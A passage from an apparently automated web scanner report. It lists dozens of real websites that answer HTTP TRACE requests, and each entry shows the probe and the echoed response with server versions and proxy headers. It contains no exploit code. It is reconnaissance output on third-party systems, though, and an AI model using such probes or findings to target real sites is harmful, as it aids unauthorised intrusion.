Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kstatecollegian.com
Cookie: bba537df8d1246ec

22.381. http://www.kungfumagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kungfumagazine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.kungfumagazine.com
Cookie: 2a048807b2ed8fa0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:42 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 2a048807b2ed8fa0
Host: www.kungfumagazine.com

22.382. http://www.kzzp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kzzp.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.kzzp.com
Cookie: 879534b4075eac60

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 123
Date: Tue, 03 May 2011 10:16:14 GMT
X-Varnish: 3393197275
Age: 0
Connection: close
X-Cache-Server: varnish01

TRACE / HTTP/1.0
Cookie: 879534b4075eac60
Host: www.kzzp.com
X-Forwarded-For: 173.193.214.243
X-Varnish: 3393197275

22.383. http://www.lacoste.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lacoste.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lacoste.com
Cookie: 4b7416f270404fce

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Tue, 03 May 2011 10:43:06 GMT
Content-Type: message/http
Content-Length: 105
Expires: Tue, 03 May 2011 10:43:06 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.lacoste.com
Cookie: 4b7416f270404fce
_FP_X_URL: http://www.lacoste.com/

22.384. http://www.lake-county-fair.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lake-county-fair.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lake-county-fair.com
Cookie: 96d7b90f288a5230

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:44 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lake-county-fair.com
Cookie: 96d7b90f288a5230

22.385. http://www.lakecompounce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakecompounce.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lakecompounce.com
Cookie: 8bd1e0ebc8d1ecbd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lakecompounce.com
Cookie: 8bd1e0ebc8d1ecbd

22.386. http://www.lakeplace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakeplace.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lakeplace.com
Cookie: 872cd4ae631abc47

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lakeplace.com
Cookie: 872cd4ae631abc47

22.387. http://www.laobserved.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laobserved.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.laobserved.com
Cookie: 2f1bc84ed6efefb5

Response

22.388. http://www.laptopical.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laptopical.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.laptopical.com
Cookie: a70227499dc23bcc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:24 GMT
Server: Apache/2.2.15 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.laptopical.com
Cookie: a70227499dc23bcc

22.389. http://www.lasalle.edu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lasalle.edu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lasalle.edu
Cookie: 5d0de932e1962cfc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lasalle.edu
Cookie: 5d0de932e1962cfc

22.390. http://www.latinspicebabes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latinspicebabes.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.latinspicebabes.com
Cookie: 6cfbc83e2f9afb23

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.latinspicebabes.com
Cookie: 6cfbc83e2f9afb23

22.391. http://www.lattc.edu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lattc.edu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lattc.edu
Cookie: 7c938a6180f34418

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Oracle HTTP Server Powered by Apache/1.3.19 (Win32) PHP/5.2.8 mod_ssl/2.8.1 OpenSSL/0.9.5a mod_fastcgi/2.2.10 mod_oprocmgr/1.0 mod_perl/1.25
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 7c938a6180f34418
Host: www.lattc.edu

22.392. http://www.laurellkhamilton.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laurellkhamilton.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.laurellkhamilton.org
Cookie: cf7ee40bef656dd6

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.laurellkhamilton.org
Cookie: cf7ee40bef656dd6

22.393. http://www.leadsonline.eu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.leadsonline.eu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.leadsonline.eu
Cookie: 40b0e5ee75a660ab

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:24 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.leadsonline.eu
Cookie: 40b0e5ee75a660ab

22.394. http://www.legendamateurs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legendamateurs.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.legendamateurs.com
Cookie: 1274ec437d34fdf7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:04 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 1274ec437d34fdf7
Host: www.legendamateurs.com

22.395. http://www.lespac.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lespac.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lespac.com
Cookie: a52c75b9f1ff340c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lespac.com
Cookie: a52c75b9f1ff340c

22.396. http://www.levolor.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.levolor.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.levolor.com
Cookie: 7ef9ec92e0e23b57

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.levolor.com
Cookie: 7ef9ec92e0e23b57

22.397. http://www.libraryspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.libraryspot.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.libraryspot.com
Cookie: bbfa4112d21216

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:37 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6 mod_perl/2.0.2 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.libraryspot.com
Cookie: bbfa4112d21216

22.398. http://www.like-em-straight.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.like-em-straight.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.like-em-straight.com
Cookie: 96022878e7d5df24

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:00 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.like-em-straight.com
Cookie: 96022878e7d5df24

22.399. http://www.likeulo.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.likeulo.us
Path:	/

Request

TRACE / HTTP/1.0
Host: www.likeulo.us
Cookie: 332ead01f82ad9cb

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.likeulo.us
Cookie: 332ead01f82ad9cb

22.400. http://www.lilydouce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lilydouce.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lilydouce.com
Cookie: 1a19405979fdf9a9

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lilydouce.com
Cookie: 1a19405979fdf9a9

22.401. http://www.littlebigplanet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlebigplanet.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.littlebigplanet.com
Cookie: 11a0347f17e09946

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 134
Date: Tue, 03 May 2011 10:34:40 GMT
X-Varnish: 2241103059
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.littlebigplanet.com
Cookie: 11a0347f17e09946
X-Forwarded-For: 173.193.214.243
X-Varnish: 2241103059

22.402. http://www.livesoccertv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livesoccertv.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.livesoccertv.com
Cookie: 10c5725211f993a

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.livesoccertv.com
Cookie: 10c5725211f993a

22.403. http://www.livingontheedge.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livingontheedge.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.livingontheedge.org
Cookie: 7a043c8d48abbfa

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:29 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.livingontheedge.org
Cookie: 7a043c8d48abbfa

22.404. http://www.llli.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.llli.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.llli.org
Cookie: 5306ff918d7fcacb

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:01 GMT
Server: Apache
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.llli.org
Cookie: 5306ff918d7fcacb

22.405. http://www.lmsal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lmsal.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lmsal.com
Cookie: 4b3151af51fe0599

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8j DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lmsal.com
Cookie: 4b3151af51fe0599

22.406. http://www.lmtribune.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lmtribune.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lmtribune.com
Cookie: 367c13f7385d2b78

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:01 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lmtribune.com
Cookie: 367c13f7385d2b78

22.407. http://www.localjobs101.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.localjobs101.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.localjobs101.com
Cookie: 28c0ab0493159eff

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.localjobs101.com
Cookie: 28c0ab0493159eff

22.408. http://www.logler.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.logler.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.logler.com
Cookie: ade822a16c0c452a

Response

22.409. http://www.longhaircommunity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.longhaircommunity.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.longhaircommunity.com
Cookie: 487c77f346dd80f

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:44 GMT
Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 487c77f346dd80f
Host: www.longhaircommunity.com

22.410. http://www.lookoutlanding.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lookoutlanding.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lookoutlanding.com
Cookie: fbfc39de86c369

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:06 GMT
Server: Apache
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lookoutlanding.com
Cookie: fbfc39de86c369
X-Forwarded-For: 173.193.214.243

22.411. http://www.luminous-landscape.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.luminous-landscape.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.luminous-landscape.com
Cookie: 198721ef44bf959b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:43:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.luminous-landscape.com
Cookie: 198721ef44bf959b

22.412. http://www.makefive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.makefive.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.makefive.com
Cookie: b50fa0caefba49da

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:40 GMT
Server: Apache/2.2.11 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.makefive.com
Cookie: b50fa0caefba49da

22.413. http://www.manchester2002-uk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manchester2002-uk.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.manchester2002-uk.com
Cookie: 8202b998c6018e1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:59:28 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8202b998c6018e1
Host: www.manchester2002-uk.com

22.414. http://www.mangahead.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mangahead.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mangahead.com
Cookie: b29fc01f0acbf3ac

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:18 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mangahead.com
Cookie: b29fc01f0acbf3ac

22.415. http://www.manhattanapts.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manhattanapts.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.manhattanapts.com
Cookie: 73296a2c33225c90

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:09 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.0.3pl1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 73296a2c33225c90
Host: www.manhattanapts.com

22.416. http://www.maniactools.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maniactools.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.maniactools.com
Cookie: 4ab15fe58eaaab81

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:50 GMT
Server: Apache/2.2.17
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.maniactools.com
Cookie: 4ab15fe58eaaab81

22.417. http://www.manycam.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manycam.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.manycam.com
Cookie: b53f3f947b39261a

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manycam.com
Cookie: b53f3f947b39261a

22.418. http://www.mature-better.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mature-better.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mature-better.com
Cookie: c0599b8a6aae4cc1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c0599b8a6aae4cc1
Host: www.mature-better.com

22.419. http://www.maxadds.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maxadds.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.maxadds.com
Cookie: 11ba5f14f6553003

Response

22.420. http://www.maxdome.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maxdome.de
Path:	/

Request

TRACE / HTTP/1.0
Host: www.maxdome.de
Cookie: de714857ef45c2a7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.maxdome.de
Cookie: de714857ef45c2a7

22.421. http://www.mayohealthsystem.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mayohealthsystem.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mayohealthsystem.org
Cookie: e05cdf4283df4579

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:52 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8f JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mayohealthsystem.org
Cookie: e05cdf4283df4579

22.422. http://www.mayura.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mayura.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mayura.com
Cookie: 2ddefab83c36bb81

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:31 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 2ddefab83c36bb81
Host: www.mayura.com

22.423. http://www.mazda6club.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mazda6club.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mazda6club.com
Cookie: 9e9990219dbeacc7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:25:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mazda6club.com
Cookie: 9e9990219dbeacc7

22.424. http://www.mbn.com.ua/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mbn.com.ua
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mbn.com.ua
Cookie: 2e0c3aa99d10a913

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:32 GMT
Server: Apache/1.3.31 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 2e0c3aa99d10a913
Host: www.mbn.com.ua

22.425. http://www.mbon.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mbon.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mbon.org
Cookie: dec3b873f8f1f802

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:21 GMT
Server: Apache/1.3.27 (Win32)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dec3b873f8f1f802
Host: www.mbon.org

22.426. http://www.mbrgames.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mbrgames.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mbrgames.com
Cookie: e15930b6db20dd7c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:12 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mbrgames.com
Cookie: e15930b6db20dd7c

22.427. http://www.mcc.edu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcc.edu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mcc.edu
Cookie: f1602cc91bd8a0e2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:36 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mcc.edu
Cookie: f1602cc91bd8a0e2

22.428. http://www.medicaiddentistry.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.medicaiddentistry.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.medicaiddentistry.com
Cookie: ded80d9614f9f783

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.medicaiddentistry.com
Cookie: ded80d9614f9f783

22.429. http://www.mgexperience.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mgexperience.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mgexperience.net
Cookie: fd134fa96a6f69d1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:58 GMT
Server: Apache/2.0.63 (FreeBSD) PHP/5.3.3 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mgexperience.net
Cookie: fd134fa96a6f69d1

22.430. http://www.michaelschenkerhimself.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.michaelschenkerhimself.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.michaelschenkerhimself.com
Cookie: 254a1d13e19854df

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.michaelschenkerhimself.com
Cookie: 254a1d13e19854df

22.431. http://www.michie.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.michie.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.michie.com
Cookie: 93bdd8e40f86c453

Response

HTTP/1.1 200 OK
Server: www.michie.com 9999
Date: Tue, 03 May 2011 10:22:24 GMT
IISExport: This web site was exported using IIS Export v4.1
X-Powered-By: ASP.NET
Connection: close
Content-Type: message/http
Content-Length: 336
Set-Cookie: BIGipServerlng-ln-michie-http-25577=824233994.59747.0000; path=/
X-RE-Ref: 1 -2077421566
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

TRACE / HTTP/1.0
Host: www.michie.com
Cookie: 93bdd8e40f86c453
Connection: Keep-Alive
X-RE-Ref: 1 -2077421566
X-RE-FEproxy: d123p-f69-wna2-a.lexisnexis.com
X-RE-ClientHTTPReqVersion: 1.0
OrigHTTPReqVersion: 1.0
RED-PATH: /
X-Forwarded-For: 173.193.214.243
...[SNIP]...

22.432. http://www.midlandstech.edu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.midlandstech.edu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.midlandstech.edu
Cookie: aa946c2342481347

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:10:30 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 74

TRACE / HTTP/1.0
Host: www.midlandstech.edu
Cookie: aa946c2342481347

22.433. http://www.minglehouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.minglehouse.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.minglehouse.com
Cookie: a499b07c8223d3b5

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:21 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.minglehouse.com
Cookie: a499b07c8223d3b5

22.434. http://www.mini001.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mini001.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mini001.com
Cookie: c111b8540497cf2c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mini001.com
Cookie: c111b8540497cf2c

22.435. http://www.mirandalambert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mirandalambert.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mirandalambert.com
Cookie: 18577a6d4a8ebf83

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:27 GMT
Server: Apache/2.2.3 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mirandalambert.com
Cookie: 18577a6d4a8ebf83

22.436. http://www.mobilerider.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mobilerider.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mobilerider.com
Cookie: 4c2605c04f3f6699

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:57 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mobilerider.com
Cookie: 4c2605c04f3f6699

22.437. http://www.momsgiveass.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.momsgiveass.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.momsgiveass.com
Cookie: e675eb0edca17ae9

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e675eb0edca17ae9
Host: www.momsgiveass.com

22.438. http://www.monica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monica.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.monica.com
Cookie: 9142f038aad90777

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.monica.com
